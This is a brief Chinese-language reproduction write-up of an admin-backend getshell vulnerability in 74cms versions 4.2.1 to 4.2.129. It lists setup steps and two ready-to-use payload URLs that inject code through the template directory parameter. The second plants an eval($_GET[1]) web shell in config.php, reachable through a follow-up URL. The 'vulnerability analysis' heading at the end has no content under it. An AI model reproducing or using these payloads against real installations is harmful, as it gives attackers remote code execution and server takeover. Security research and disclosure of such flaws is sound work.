74cms v4.2.1-v4.2.129-后台getshell漏洞复现
0x00 影响范围
v4.2.1-v4.2.129
0x01 环境搭建
1. 先去官网下载 骑士人才系统基础版(安装包)
2.将下载好的包进行安装
0x02 复现过程
当前版本v4.2.111
点加工具,点击风格模板
Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'
shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php
直接访问
后端代码
GETSHELL
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'
后端代码
http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();
0x03 漏洞分析